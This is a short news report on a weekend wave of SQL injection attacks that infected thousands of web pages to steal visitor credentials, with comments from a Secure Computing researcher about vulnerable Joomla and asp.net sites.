Websites that use Joomla,
an open source content management system, are vulnerable to the
latest round of
SQL injection attacks, says a security researcher.
Christoph Alme, a malware specialist at security firm
Secure Computing,
said, "There are more than five million Joomla pages out
there."
The latest attack, discovered over the weekend by Secure
Computing, used search engines to speed up their search for
vulnerable web pages into which they can inject SQL statements that
will steal passwords to bank, game and other accounts.
The criminals searched for asp.net pages that contained
vulnerable order forms and sign-on details. Once they discovered an
unprotected page, they used it to place SQL code on the underlying
database that recorded personal details of visitors to the site.
More than 14,000 web pages were infected in the weekend attack.
"There has been a big rise in SQL injection attacks this year,"
Alme said. He said the current attack, which infected at least 20
popular UK sites, was dangerous because it was aimed at sites that
people were likely to visit regularly.
"Government sites are as vulnerable as commercial sites," he
said. "The visitor may have visited the site last week without
problems. This week he trusts the site, but is hit by a drive-by
attack," Alme said.
He said the criminals also hid malware in downloads of popular
software such as QuickTime and RealPlayer.